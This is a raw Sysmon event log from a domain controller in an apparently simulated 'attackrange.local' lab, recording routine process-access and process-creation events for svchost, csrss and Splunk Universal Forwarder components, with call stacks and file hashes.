13:41:15.940{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.940{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.940{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.940{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.940{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-49FB-6000-8605-000000009A01}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.940{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49FB-6000-8605-000000009A01}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.941{08A6967A-49FB-6000-8605-000000009A01}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.268{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49FB-6000-8505-000000009A01}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.268{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.268{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.268{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.268{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.268{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-49FB-6000-8505-000000009A01}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.268{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49FB-6000-8505-000000009A01}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.269{08A6967A-49FB-6000-8505-000000009A01}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:16.518{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49FC-6000-8705-000000009A01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:16.518{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:16.518{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:16.518{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:16.518{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:16.518{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-49FC-6000-8705-000000009A01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:16.518{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49FC-6000-8705-000000009A01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:16.520{08A6967A-49FC-6000-8705-000000009A01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:16.096{08A6967A-49FB-6000-8605-000000009A01}64446440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:17.675{08A6967A-49FD-6000-8805-000000009A01}48083760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:17.518{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49FD-6000-8805-000000009A01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:17.518{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:17.518{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 